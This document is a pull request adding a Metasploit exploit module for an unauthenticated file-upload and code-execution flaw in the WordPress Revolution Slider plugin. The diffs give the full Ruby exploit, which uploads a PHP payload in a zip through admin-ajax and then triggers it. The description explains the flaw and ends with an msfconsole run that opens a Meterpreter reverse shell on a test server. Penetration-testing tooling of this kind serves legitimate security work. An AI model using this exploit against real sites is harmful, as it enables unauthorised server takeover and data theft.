### PR TITLE
Add Wordpress RevSlider File Upload and Execute Vulnerability

### DIFF
--- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
+++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
@@ -29,6 +29,7 @@ class Metasploit3 < Msf::Exploit::Remote
         [
           ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
           ['EDB', '35385'],
+          ['WPVDB', '7954'],
           ['OSVDB', '115118']
         ],
       'Privileged'     => false,

--- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
+++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
@@ -1,0 +1,126 @@
+##
+# This module requires Metasploit: http://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+require 'msf/core'
+
+class Metasploit3 < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::HTTP::Wordpress
+  include Msf::Exploit::FileDropper
+  require 'rex/zip'
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'           => 'Wordpress RevSlider File Upload and Execute Vulnerability',
+      'Description'    => %q{
+        This module exploits an arbitrary PHP code upload in the WordPress ThemePunch
+        Revolution Slider ( revslider ) plugin, version 3.0.95 and prior. The
+        vulnerability allows for arbitrary file upload and remote code execution.
+      },
+      'Author'         =>
+        [
+          'Simo Ben youssef', # Vulnerability discovery
+          'Tom Sellers <tom[at]fadedcode.net>'  # Metasploit module
+        ],
+      'License'        => MSF_LICENSE,
+      'References'     =>
+        [
+          ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
+          ['URL', 'https://www.exploit-db.com/exploits/35385/'],
+          ['EDB', '35385'],
+          ['OSVDB', '115118']
+        ],
+      'Privileged'     => false,
+      'Platform'       => 'php',
+      'Arch'           => ARCH_PHP,
+      'Targets'        => [['ThemePunch Revolution Slider (revslider) 3.0.95', {}]],
+      'DisclosureDate' => 'Nov 26 2015',
+      'DefaultTarget'  => 0)
+    )
+  end
+
+  def check
+    fixed_version = '3.0.96'
+
+    # RevSlider doesn't have a readme.txt, look elsewhere
+    release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
+    vprint_status("#{peer} - Checking #{release_log_url}")
+    res = send_request_cgi(
+      'uri'    => release_log_url,
+      'method' => 'GET'
+    )
+
+    if res.nil? || res.code != 200
+      # No release_log.txt present for plugin
+      return Msf::Exploit::CheckCode::Unknown
+    end
+
+    if res.body
+      body = res.body.to_s
+      version = body[/(?:version)\s*([0-9a-z.-]+)/i, 1]
+    end
+
+    # Could not identify version number
+    return Msf::Exploit::CheckCode::Detected if version.nil?
+
+    vprint_status("#{peer} - Found version #{version}")
+
+    # Check to see if version older than fixed version
+    if Gem::Version.new(version) < Gem::Version.new(fixed_version)
+      return Msf::Exploit::CheckCode::Appears
+    else
+      return Msf::Exploit::CheckCode::Safe
+    end
+  end
+
+  def exploit
+    php_pagename = rand_text_alpha(4 + rand(4)) + '.php'
+
+    # Build the zip
+    payload_zip = Rex::Zip::Archive.new
+    # If the filename in the zip is revslider.php it will be automatically
+    # executed but it will break the plugin and sometimes WordPress
+    payload_zip.add_file('revslider/' + php_pagename, payload.encoded)
+
+    # Build the POST body
+    data = Rex::MIME::Message.new
+    data.add_part('revslider_ajax_action', nil, nil, 'form-data; name="action"')
+    data.add_part('update_plugin', nil, nil, 'form-data; name="client_action"')
+    data.add_part(payload_zip.pack, 'application/x-zip-compressed', 'binary', "form-data; name=\"update_file\"; filename=\"revslider.zip\"")
+    post_data = data.to_s
+
+    res = send_request_cgi(
+      'uri'     => wordpress_url_admin_ajax,
+      'method'  => 'POST',
+      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
+      'data'    => post_data
+    )
+
+    if res
+      if res.code == 200 && res.body =~ /Update in progress/
+        # The payload itself almost never deleted, try anyway
+        register_files_for_cleanup(php_pagename)
+        # This normally works
+        register_files_for_cleanup('../revslider.zip')
+        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', '/temp/update_extract/revslider/' + php_pagename)
+        print_good("#{peer} - Our payload is at: #{final_uri}")
+        print_status("#{peer} - Calling payload...")
+        send_request_cgi(
+          'uri'     => normalize_uri(final_uri),
+          'timeout' => 5
+        )
+      elsif res.code == 200 && res.body =~ /^0$/
+        # admin-ajax.php returns 0 if the 'action' 'revslider_ajax_action' is unknown
+        fail_with(Failure::NotVulnerable, "#{peer} - Target not vulnerable or the plugin is deactivated")
+      else
+        fail_with(Failure::UnexpectedReply, "#{peer} - Unable to deploy payload, server returned #{res.code}")
+      end
+    else
+      fail_with(Failure::Unknown, 'ERROR')
+    end
+
+  end
+end

--- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
+++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
@@ -10,7 +10,6 @@ class Metasploit3 < Msf::Exploit::Remote
 
   include Msf::HTTP::Wordpress
   include Msf::Exploit::FileDropper
-  require 'rex/zip'
 
   def initialize(info = {})
     super(update_info(info,
@@ -29,7 +28,6 @@ class Metasploit3 < Msf::Exploit::Remote
       'References'     =>
         [
           ['URL', 'https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/'],
-          ['URL', 'https://www.exploit-db.com/exploits/35385/'],
           ['EDB', '35385'],
           ['OSVDB', '115118']
         ],
@@ -105,7 +103,7 @@ class Metasploit3 < Msf::Exploit::Remote
         register_files_for_cleanup(php_pagename)
         # This normally works
         register_files_for_cleanup('../revslider.zip')
-        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', '/temp/update_extract/revslider/' + php_pagename)
+        final_uri = normalize_uri(wordpress_url_plugins, 'revslider', 'temp', 'update_extract', 'revslider', php_pagename)
         print_good("#{peer} - Our payload is at: #{final_uri}")
         print_status("#{peer} - Calling payload...")
         send_request_cgi(

--- a/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
+++ b/modules/exploits/unix/webapp/wp_revslider_upload_execute.rb
@@ -41,37 +41,8 @@ class Metasploit3 < Msf::Exploit::Remote
   end
 
   def check
-    fixed_version = '3.0.96'
-
-    # RevSlider doesn't have a readme.txt, look elsewhere
     release_log_url = normalize_uri(wordpress_url_plugins, 'revslider', 'release_log.txt')
-    vprint_status("#{peer} - Checking #{release_log_url}")
-    res = send_request_cgi(
-      'uri'    => release_log_url,
-      'method' => 'GET'
-    )
-
-    if res.nil? || res.code != 200
-      # No release_log.txt present for plugin
-      return Msf::Exploit::CheckCode::Unknown
-    end
-
-    if res.body
-      body = res.body.to_s
-      version = body[/(?:version)\s*([0-9a-z.-]+)/i, 1]
-    end
-
-    # Could not identify version number
-    return Msf::Exploit::CheckCode::Detected if version.nil?
-
-    vprint_status("#{peer} - Found version #{version}")
-
-    # Check to see if version older than fixed version
-    if Gem::Version.new(version) < Gem::Version.new(fixed_version)
-      return Msf::Exploit::CheckCode::Appears
-    else
-      return Msf::Exploit::CheckCode::Safe
-    end
+    check_version_from_custom_file(release_log_url, /^\s*(?:version)\s*(\d{1,2}\.\d{1,2}(?:\.\d{1,2})?).*$/mi, '3.0.96')
   end
 
   def exploit


### PR DESCRIPTION
**Add Wordpress RevSlider File Upload and Execute Vulnerability**

**Description**

ThemePunch Revolution Slider, according to the vendor, is the #1 WordPress Slider plugin available with over 55,000 sales [1]  on CodeCanyon.

ThemePunch Revolution Slider ( revslider ) 3.0.95 and prior have a vulnerability the permits arbitrary file uploads by unauthenticated users.  This is due a logic error that registered WordPress ajax actions for both privileged and unprivileged users.  As the plugin provides the ability to update itself this enables unauthenticated users to upload a zip file that will be unpacked and copied into place.  If the zip file contains a file named revslider.php in the revslider directory then this file will be copied over the main plugin file and executed.  While this enables code execution without having to make a second HTTP request, it breaks the revslider plugin and often WordPress.  If the file doesn't contain the revslider.php file, the contents of the zip will be unpacked and an error returned to the caller.  The unpacked files are left in place and can be called remotely via a HTTP GET to trigger the payload.

This module is a port of an existing publicly available exploit [2]. The vulnerability is actively being exploited on the internet.

**Verification**
- [x] Install WordPress [3]
- [x] Locate and install a version of Revolution Slider 3.0.95 or earlier
  - [x]  Sign into WordPress as an admin
  - [x]  Select Plugins on the left
  - [x]  To the right of Plugins at the top of the page, click Add New
  - [x]  To the right of Add Plugins at the top of the page, click Upload Plugin
  - [x]  Click Choose File, chose the zip containing the plugin, click Ok
  - [x]  Click Install Now
  - [x]  Click Activate Plugin
- [x] Launch msfconsole

```
msf > use exploit/unix/webapp/wp_revslider_upload_execute
msf exploit(wp_revslider_upload_execute) > info

       Name: Wordpress RevSlider File Upload and Execute Vulnerability
     Module: exploit/unix/webapp/wp_revslider_upload_execute
   Platform: PHP
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2015-11-26

Provided by:
  Simo Ben youssef
  Tom Sellers <tom@fadedcode.net>

Available targets:
  Id  Name
  --  ----
  0   ThemePunch Revolution Slider (revslider) 3.0.95

Basic options:
  Name       Current Setting  Required  Description
  ----       ---------------  --------  -----------
  Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
  RHOST                       yes       The target address
  RPORT      80               yes       The target port
  TARGETURI                   yes       The base path to the wordpress application
  VHOST                       no        HTTP server virtual host

Payload information:

Description:
  This module exploits an arbitrary PHP code upload in the WordPress 
  ThemePunch Revolution Slider ( revslider ) plugin, version 3.0.95 
  and prior. The vulnerability allows for arbitrary file upload and 
  remote code execution.

References:
  https://whatisgon.wordpress.com/2014/11/30/another-revslider-vulnerability/
  https://www.exploit-db.com/exploits/35385/
  http://www.exploit-db.com/exploits/35385
  http://www.osvdb.org/115118

msf exploit(wp_revslider_upload_execute) > show options

Module options (exploit/unix/webapp/wp_revslider_upload_execute):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOST                       yes       The target address
   RPORT      80               yes       The target port
   TARGETURI                   yes       The base path to the wordpress application
   VHOST                       no        HTTP server virtual host


Payload options (php/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.20.150     yes       The listen address
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   ThemePunch Revolution Slider (revslider) 3.0.95


msf exploit(wp_revslider_upload_execute) > set RHOST 10.10.10.11
RHOST => 10.10.10.11
msf exploit(wp_revslider_upload_execute) > set TARGETURI /wordpress
TARGETURI => /wordpress
msf exploit(wp_revslider_upload_execute) > exploit

[*] Started reverse handler on 10.10.20.150:4444 
[+] 10.10.10.11:80 - Our payload is at: /wordpress/wp-content/plugins/revslider/temp/update_extract/revslider/zQvxQ.php
[*] 10.10.10.11:80 - Calling payload...
[*] Sending stage (40499 bytes) to 10.10.10.11
[*] Meterpreter session 8 opened (10.10.20.150:4444 -> 10.10.10.11:49224) at 2015-05-02 09:31:24 -0500
[+] Deleted zQvxQ.php
[+] Deleted ../revslider.zip

getuid

meterpreter > 
meterpreter > getuid
Server username: IUSR (0)
meterpreter > sysinfo
Computer    : VICSERVER01
OS          : Windows NT VICSERVER01 6.2 build 9200 (Unknown Windows version Datacenter Edition) i586
Meterpreter : php/php
meterpreter > 

```

My testing was performed against a Windows 2012 R2 server running WordPress 4.2 and Revolution Slider 3.0.95.  The output above was with VERBOSE set to true.

On a related note, the WordPress exploits are in modules/exploits/unix/webapp.  Should these be moved to modules/exploits/multi/http?

References:
1. http://codecanyon.net/item/slider-revolution-responsive-wordpress-plugin/2751380
2. https://www.exploit-db.com/exploits/35385/
3. On Windows the Web Platform installer can be used to install Wordpress, MySQL, and other deps easily
   https://codex.wordpress.org/Installing_WordPress#Easy_5_Minute_WordPress_Installation_on_Windows
